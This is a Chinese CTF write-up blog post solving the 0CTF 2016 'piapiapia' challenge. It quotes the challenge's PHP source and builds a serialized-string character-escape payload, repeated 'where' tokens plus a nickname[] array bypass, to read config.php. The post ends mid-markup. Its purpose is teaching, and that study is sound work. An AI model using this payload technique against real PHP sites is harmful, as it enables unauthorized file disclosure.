{"id":205,"date":"2026-06-01T19:49:47","date_gmt":"2026-06-01T11:49:47","guid":{"rendered":"https:\/\/asum1.fun\/?p=205"},"modified":"2026-06-02T10:32:45","modified_gmt":"2026-06-02T02:32:45","slug":"ctf%c2%b2-0ctf-2016piapiapia","status":"publish","type":"post","link":"https:\/\/asum1.fun\/index.php\/2026\/06\/01\/ctf%c2%b2-0ctf-2016piapiapia\/","title":{"rendered":"CTF\u00b2-[0CTF 2016]piapiapia"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u770b\u5230\u4e00\u4e2a\u767b\u5f55\u6846\uff0c\u8bd5\u4e00\u4e0bsql\u6ce8\u5165\uff0c\u5c1d\u8bd5\u65e0\u679c\u5f00\u59cb\u626b\u76ee\u5f55<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-1024x611.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"611\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-1024x611.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-206\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u770b\u4e00\u773crobots.txt\uff0c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-1.png'><img class=\"lazyload lazyload-style-5\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"666\" height=\"267\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-207\"  sizes=\"auto, (max-width: 666px) 100vw, 666px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-2.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"747\" height=\"282\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-208\"  sizes=\"auto, (max-width: 747px) 100vw, 747px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ca1\u4e1c\u897f\uff0c\u63a5\u7740\u8bd5\u4e86\u4e0bwww.zip\u62ff\u5230\u6e90\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-3-1024x473.png'><img class=\"lazyload lazyload-style-5\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"473\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-3-1024x473.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-209\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5feb\u901f\u6d4f\u89c8\u4e00\u904d\u5f97\u77e5flag\u5728config.php\u91cc\u9762\uff0c\u8fd9\u9898\u5e94\u8be5\u662f\u8981\u6587\u4ef6\u8bfb\u53d6config.php<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-4.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"558\" height=\"381\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-4.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-210\" style=\"width:558px;height:auto\"  sizes=\"auto, (max-width: 558px) 100vw, 558px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ce8\u610f\u5230profile.php\u4e2d\u542b\u6709file_get_contents()<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/profile.php\n&lt;?php  \n\trequire_once('class.php');     
\/\/\u5185\u90e8\u6709\u4ee3\u7801\u4f1a\u7528\u5230class.php\u7684\u51fd\u6570\n\tif($_SESSION&#91;'username'] == null) {\n\t\tdie('Login First');\t\n\t}\n\t$username = $_SESSION&#91;'username'];\n\t$profile=$user-&gt;show_profile($username);\n\tif($profile  == null) {\n\t\theader('Location: update.php');\n\t}\n\telse {\n\t\t$profile=unserialize($profile);\n\t\t$phone = $profile&#91;'phone'];\n\t\t$email = $profile&#91;'email'];\n\t\t$nickname = $profile&#91;'nickname'];\n\t\t$photo = base64_encode(file_get_contents($profile&#91;'photo']));   \/\/\u51fa\u73b0file_get_contents()\n?&gt;\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n   &lt;title&gt;Profile&lt;\/title&gt;\n   &lt;link href=\"static\/bootstrap.min.css\" rel=\"stylesheet\"&gt;\n   &lt;script src=\"static\/jquery.min.js\"&gt;&lt;\/script&gt;\n   &lt;script src=\"static\/bootstrap.min.js\"&gt;&lt;\/script&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n\t&lt;div class=\"container\" style=\"margin-top:100px\"&gt;  \n\t\t&lt;img src=\"data:image\/gif;base64,&lt;?php echo $photo; ?&gt;\" class=\"img-memeda \" style=\"width:180px;margin:0px auto;\"&gt;\n\t\t&lt;h3&gt;Hi &lt;?php echo $nickname;?&gt;&lt;\/h3&gt;\n\t\t&lt;label&gt;Phone: &lt;?php echo $phone;?&gt;&lt;\/label&gt;\n\t\t&lt;label&gt;Email: &lt;?php echo $email;?&gt;&lt;\/label&gt;\n\t&lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n&lt;?php\n\t}\n?&gt;\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u770b\u4e00\u4e0b$profile[&#8216;photo&#8217;]\u662f\u4ece\u54ea\u91cc\u6765\u7684<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>$profile=$user-&gt;show_profile($username); $profile=unserialize($profile);<\/code> <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f00\u5934\u6709\u4e2arequire_once(&#8216;class.php&#8217;); \uff0c\u6211\u4eec\u53bbclass.php\u770b\u770bshow_profile()\u662f\u600e\u4e48\u5b9a\u4e49\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/class.php\n&lt;?php\nrequire('config.php');\n\nclass user extends mysql{\n\tprivate 
$table = 'users';\n\n\tpublic function is_exists($username) {\n\t\t$username = parent::filter($username);\n\n\t\t$where = \"username = '$username'\";\n\t\treturn parent::select($this-&gt;table, $where);\n\t}\n\tpublic function register($username, $password) {\n\t\t$username = parent::filter($username);\n\t\t$password = parent::filter($password);\n\n\t\t$key_list = Array('username', 'password');\n\t\t$value_list = Array($username, md5($password));\n\t\treturn parent::insert($this-&gt;table, $key_list, $value_list);\n\t}\n\tpublic function login($username, $password) {\n\t\t$username = parent::filter($username);\n\t\t$password = parent::filter($password);\n\n\t\t$where = \"username = '$username'\";\n\t\t$object = parent::select($this-&gt;table, $where);\n\t\tif ($object &amp;&amp; $object-&gt;password === md5($password)) {\n\t\t\treturn true;\n\t\t} else {\n\t\t\treturn false;\n\t\t}\n\t}\n\tpublic function show_profile($username) {       \/\/ciallo\uff0c\u5728\u8fd9\u91cc\n\t\t$username = parent::filter($username);    \/\/filter\u5728\u4e0b\u9762mysql\u5b9a\u4e49\u4e86\n\n\t\t$where = \"username = '$username'\";\n\t\t$object = parent::select($this-&gt;table, $where);     \/\/select\u4e5f\u5728\u4e0b\u9762\u5b9a\u4e49\n\t\treturn $object-&gt;profile;\n\t}\n\tpublic function update_profile($username, $new_profile) {\n\t\t$username = parent::filter($username);\n\t\t$new_profile = parent::filter($new_profile);\n\n\t\t$where = \"username = '$username'\";\n\t\treturn parent::update($this-&gt;table, 'profile', $new_profile, $where);\n\t}\n\tpublic function __tostring() {\n\t\treturn __class__;\n\t}\n}\n\nclass mysql {\n\tprivate $link = null;\n\n\tpublic function connect($config) {\n\t\t$this-&gt;link = mysql_connect(\n\t\t\t$config&#91;'hostname'],\n\t\t\t$config&#91;'username'], \n\t\t\t$config&#91;'password']\n\t\t);\n\t\tmysql_select_db($config&#91;'database']);\n\t\tmysql_query(\"SET sql_mode='strict_all_tables'\");\n\n\t\treturn $this-&gt;link;\n\t}\n\n\tpublic 
function select($table, $where, $ret = '*') {\n\t\t$sql = \"SELECT $ret FROM $table WHERE $where\";\n\t\t$result = mysql_query($sql, $this-&gt;link);\n\t\treturn mysql_fetch_object($result);\n\t}\n\n\tpublic function insert($table, $key_list, $value_list) {\n\t\t$key = implode(',', $key_list);\n\t\t$value = '\\'' . implode('\\',\\'', $value_list) . '\\''; \n\t\t$sql = \"INSERT INTO $table ($key) VALUES ($value)\";\n\t\treturn mysql_query($sql);\n\t}\n\n\tpublic function update($table, $key, $value, $where) {\n\t\t$sql = \"UPDATE $table SET $key = '$value' WHERE $where\";\n\t\treturn mysql_query($sql);\n\t}\n\n\tpublic function filter($string) {                   \n\t\t$escape = array('\\'', '\\\\\\\\');\n\t\t$escape = '\/' . implode('|', $escape) . '\/';\n\t\t$string = preg_replace($escape, '_', $string);\n\n\t\t$safe = array('select', 'insert', 'update', 'delete', 'where');\n\t\t$safe = '\/' . implode('|', $safe) . '\/i';\n\t\treturn preg_replace($safe, 'hacker', $string);\n\t}\n\tpublic function __tostring() {\n\t\treturn __class__;\n\t}\n}\nsession_start();\n$user = new user();\n$user-&gt;connect($config);\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>filter()<\/strong>\u548c<strong>select()<\/strong>\u5728mysql\u4e2d\u5b9a\u4e49\u4e86\uff0c<strong>select<\/strong>\u4f1a\u53bb\u627e\u5230<code>username = '$username'<\/code> \u7684profile\u5b57\u6bb5\uff08\u5e8f\u5217\u5316\u540e\u7684\u6570\u7ec4\uff09\uff0c\u800c<strong>filter<\/strong>\u4f1a\u628aprofile\u5f53\u4e2d\u7684'select', 'insert', 'update', 'delete', 'where'\u5168\u90e8\u8f6c\u6362\u6210'hacker'\u3002\u9700\u8981\u6ce8\u610f\u7684\u662f<strong>'where'\u8f6c'hacker'\u662f5\u4e2a\u5b57\u7b26\u8f6c6\u4e2a\u5b57\u7b26\uff08select\u3001insert\u3001update\u3001delete\u548chacker\u4e00\u6837\u662f6\u4e2a\u5b57\u7b26\uff0c\u957f\u5ea6\u4e0d\u53d8\uff09\uff0c\u4e3a\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u9003\u9038\u7559\u4e0b\u4e86\u7a7a\u95f4<\/strong><\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u6211\u4eec\u63a5\u7740\u770bprofile\u662f\u5982\u4f55\u4e0a\u4f20\u7684\uff0c\u770b\u5230update.php<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/update.php\n&lt;?php\n\trequire_once('class.php');\n\tif($_SESSION&#91;'username'] == null) {\n\t\tdie('Login First');\t\n\t}\n\tif($_POST&#91;'phone'] &amp;&amp; $_POST&#91;'email'] &amp;&amp; $_POST&#91;'nickname'] &amp;&amp; $_FILES&#91;'photo']) {    \/\/\u4f20\u5165\u56db\u4e2a\u503c\n\n\t\t$username = $_SESSION&#91;'username'];   \n\t\tif(!preg_match('\/^\\d{11}$\/', $_POST&#91;'phone']))                      \/\/\u5339\u914d11\u4f4d\u7684\u53f7\u7801\n\t\t\tdie('Invalid phone');\n\n\t\tif(!preg_match('\/^&#91;_a-zA-Z0-9]{1,10}@&#91;_a-zA-Z0-9]{1,10}\\.&#91;_a-zA-Z0-9]{1,10}$\/', $_POST&#91;'email'])) \/\/\u5339\u914d\u90ae\u7bb1\u683c\u5f0f\n\t\t\tdie('Invalid email');\n\t\t\n\t\tif(preg_match('\/&#91;^a-zA-Z0-9_]\/', $_POST&#91;'nickname']) || strlen($_POST&#91;'nickname']) &gt; 10) \n                                                            \/\/\u53ea\u80fd\u7531\u5b57\u6bcd\u548c\u6570\u5b57\u7ec4\u6210\u5e76\u4e14\u957f\u5ea6\u4e0d\u5f97\u8d85\u8fc710\u4f46\u662f\u53ef\u4ee5\u901a\u8fc7\u4f20\u5165\u6570\u7ec4\u6765\u7ed5\u8fc7\n\t\t\tdie('Invalid nickname');\n\n\t\t$file = $_FILES&#91;'photo'];     \n\t\tif($file&#91;'size'] &lt; 5 or $file&#91;'size'] &gt; 1000000)       \/\/photo\u7684\u5927\u5c0f\u4e0d\u80fd\u5c0f\u4e8e5\u6216\u8005\u5927\u4e8e1000000\n\t\t\tdie('Photo size error');\n\n\t\tmove_uploaded_file($file&#91;'tmp_name'], 'upload\/' . md5($file&#91;'name']));\n\t\t$profile&#91;'phone'] = $_POST&#91;'phone'];\n\t\t$profile&#91;'email'] = $_POST&#91;'email'];\n\t\t$profile&#91;'nickname'] = $_POST&#91;'nickname'];\n\t\t$profile&#91;'photo'] = 'upload\/' . 
md5($file&#91;'name']);\n\n\t\t$user-&gt;update_profile($username, serialize($profile));      \/\/\u8fd9\u91cc\u5c06\u5e8f\u5217\u5316\u7684profile\u6240\u6709\u6570\u636e\u5e8f\u5217\u5316\u540e\u4f20\u5230\u6570\u636e\u5e93\n\t\techo 'Update Profile Success!&lt;a href=\"profile.php\"&gt;Your Profile&lt;\/a&gt;';\n\t}\n\telse {\n?&gt;\n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n   &lt;title&gt;UPDATE&lt;\/title&gt;\n   &lt;link href=\"static\/bootstrap.min.css\" rel=\"stylesheet\"&gt;\n   &lt;script src=\"static\/jquery.min.js\"&gt;&lt;\/script&gt;\n   &lt;script src=\"static\/bootstrap.min.js\"&gt;&lt;\/script&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n\t&lt;div class=\"container\" style=\"margin-top:100px\"&gt;  \n\t\t&lt;form action=\"update.php\" method=\"post\" enctype=\"multipart\/form-data\" class=\"well\" style=\"width:220px;margin:0px auto;\"&gt; \n\t\t\t&lt;img src=\"static\/piapiapia.gif\" class=\"img-memeda \" style=\"width:180px;margin:0px auto;\"&gt;\n\t\t\t&lt;h3&gt;Please Update Your Profile&lt;\/h3&gt;\n\t\t\t&lt;label&gt;Phone:&lt;\/label&gt;\n\t\t\t&lt;input type=\"text\" name=\"phone\" style=\"height:30px\"class=\"span3\"\/&gt;\n\t\t\t&lt;label&gt;Email:&lt;\/label&gt;\n\t\t\t&lt;input type=\"text\" name=\"email\" style=\"height:30px\"class=\"span3\"\/&gt;\n\t\t\t&lt;label&gt;Nickname:&lt;\/label&gt;\n\t\t\t&lt;input type=\"text\" name=\"nickname\" style=\"height:30px\" class=\"span3\"&gt;\n\t\t\t&lt;label for=\"file\"&gt;Photo:&lt;\/label&gt;\n\t\t\t&lt;input type=\"file\" name=\"photo\" style=\"height:30px\"class=\"span3\"\/&gt;\n\t\t\t&lt;button type=\"submit\" class=\"btn btn-primary\"&gt;UPDATE&lt;\/button&gt;\n\t\t&lt;\/form&gt;\n\t&lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n&lt;?php\n\t}\n?&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>$user-&gt;update_profile($username, serialize($profile)); <\/strong> 
\u4e0a\u4f20\u7684\u6838\u5fc3\u4ee3\u7801\u662f\u8fd9\u6837\uff0c\u56de\u770b\u5230class.php\uff0c\u53d1\u73b0\u8fd9\u91cc\u662f<strong>\u5148\u5c06\u6570\u636e\u5e8f\u5217\u5316<\/strong>\u7136\u540e<strong>\u7ecf\u8fc7filter()<\/strong>\uff0c\u518d\u4f20\u56de\u6570\u636e\u5e93\uff0cfilter()\u628awhere\u8f6c\u6362\u6210hacker\u540e\u5b57\u7b26\u4e32\u53d8\u957f\uff0c\u4f46\u5e8f\u5217\u5316\u7ed3\u679c\u4e2d\u7684\u957f\u5ea6\u503c\u4e0d\u53d8\uff0c\u8fd9\u91cc\u5c31\u5b58\u5728\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u9003\u9038\u7684\u7a7a\u95f4\u3002\u6211\u4eec\u8fd9\u91cc\u5148\u770b\u4e00\u4e0b\u6b63\u5e38\u7684\u5e8f\u5217\u5316\u7ed3\u679c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$profile&#91;'phone'] = \"12345678990\";\n$profile&#91;'email'] = \"4321@qq.com\";\n$profile&#91;'nickname'] = \"123\";\n$profile&#91;'photo'] = 'upload\/' . md5(\"abc.jpg\");\n\necho serialize($profile);<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51fa\uff1a<code>a:4:{s:5:\"phone\";s:11:\"12345678990\";s:5:\"email\";s:11:\"4321@qq.com\";s:8:\"nickname\";s:3:\"123\";s:5:\"photo\";s:39:\"upload\/75639d4112bb5a157b65bb18136ccd4e\";}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u9700\u8981photo\u7684\u503c\u4e3aconfig.php\uff0c\u6240\u4ee5\u6784\u9020<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$profile&#91;'phone'] = \"12345678990\";\n$profile&#91;'email'] = \"4321@qq.com\";\n$profile&#91;'nickname'] = \"123\";\n$profile&#91;'photo'] = \"config.php\";\n\necho serialize($profile);<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ed3\u679c\uff1a<code>a:4:{s:5:\"phone\";s:11:\"12345678990\";s:5:\"email\";s:11:\"4321@qq.com\";s:8:\"nickname\";s:3:\"123\";s:5:\"photo\";s:10:\"config.php\";}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u90a3\u4e48nickname\u7684\u672b\u5c3e\u4e00\u5b9a\u662f<code>\";s:5:\"photo\";s:10:\"config.php\";}<\/code> \u8fd9\u6837\u7684\uff0c\u6211\u4eec\u770b\u4e00\u4e0b\u8fd9\u6bb5\u4ee3\u7801\u7684\u957f\u5ea6\uff0c\u4e86\u89e3\u6211\u4eec\u8981\u8865\u591a\u957f\u8fdb\u53bb\uff1a<code>echo strlen('\";s:5:\"photo\";s:10:\"config.php\";}');<\/code> 
\u7ed3\u679c\u662f33\uff0c\u6240\u4ee5nickname\u8981\u670933\u4e2awhere\uff0c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$profile&#91;'phone'] = \"12345678990\";\n$profile&#91;'email'] = \"4321@qq.com\";\n$profile&#91;'nickname'] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}';\n$profile&#91;'photo'] = 'upload\/' . md5(\"abc.jpg\");\n\necho serialize($profile);<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51fa\uff1a<code>-\u7701\u7565-21@qq.com\";s:8:\"nickname\";s:198:\"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}\";s:5:\"photo\";s:39:\"upload\/75639d4-\u7701\u7565-<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u628a\u8fd9\u4e2a\u7ed3\u679c\u7ecf\u8fc7filter()\u540e33\u4e2awhere\u53d8\u621033\u4e2ahacker\uff0c\u521a\u597d\u662f198\u4e2a\u5b57\u7b26\uff0c\u540e\u9762\u7684<code>;s:5:\"photo\";s:10:\"config.php\";}<\/code>\u5c31\u9003\u9038\u4e86\u51fa\u6765\uff0c\u5728\u53cd\u5e8f\u5217\u5316\u540e\u5c31\u4f1a\u8ba9photo\u7684\u503c\u53d8\u6210config.php<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6784\u9020\u597d\u540e\uff0c\u6211\u4eec\u6765\u505a\u9898\uff0c\u5148\u8fdb\u5165\/register.php\u968f\u4fbf\u6ce8\u518c\u4e00\u4e2a\u7528\u6237admin\uff0c123<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-5-1024x600.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" 
decoding=\"async\" width=\"1024\" height=\"600\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-5-1024x600.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-214\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u767b\u5f55<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-6-1024x587.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-6-1024x587.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-215\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-7-1024x705.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"705\" 
data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-7-1024x705.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-216\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f20\u5165\u6570\u636e\u540e\u6293\u5305\uff0c\u6539nickname\u4e3anickname[]\u7136\u540e\u4f20\u5165\u6784\u9020\u7684payload\uff1a<code>wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}<\/code>\u4f46\u662f\u8fd9\u6837\u53c8\u4e0d\u884c\u4e86\uff0c\u56e0\u4e3a\u6570\u7ec4\u7684\u5e8f\u5217\u5316\u548c\u5b57\u7b26\u4e32\u7684\u4e0d\u4e00\u6837<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$profile&#91;'phone'] = \"12345678990\";\n$profile&#91;'email'] = \"4321@qq.com\";\n$profile&#91;'nickname']&#91;] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}';\n$profile&#91;'photo'] = 'upload\/' . 
md5(\"abc.jpg\");\n\necho serialize($profile);<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51fa<code>a:4:{s:5:\"phone\";s:11:\"12345678990\";s:5:\"email\";s:11:\"4321@qq.com\";s:8:\"nickname\";a:1:{i:0;s:198:\"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";s:5:\"photo\";s:10:\"config.php\";}\";}s:5:\"photo\";s:39:\"upload\/75639d4112bb5a157b65bb18136ccd4e\";}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6570\u7ec4\u7684\u672b\u5c3e\u4f1a\u591a\u4e00\u4e2a}\uff0c\u6240\u4ee5\u8fd9\u91cc\u8981\u670934\u4e2awhere\uff0c\u540c\u65f6\u8865\u4e0a}\uff0c\u6784\u9020\u4e3a<code><code>where<\/code>wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";}s:5:\"photo\";s:10:\"config.php\";}<\/code><\/p>\n\n\n\n<p 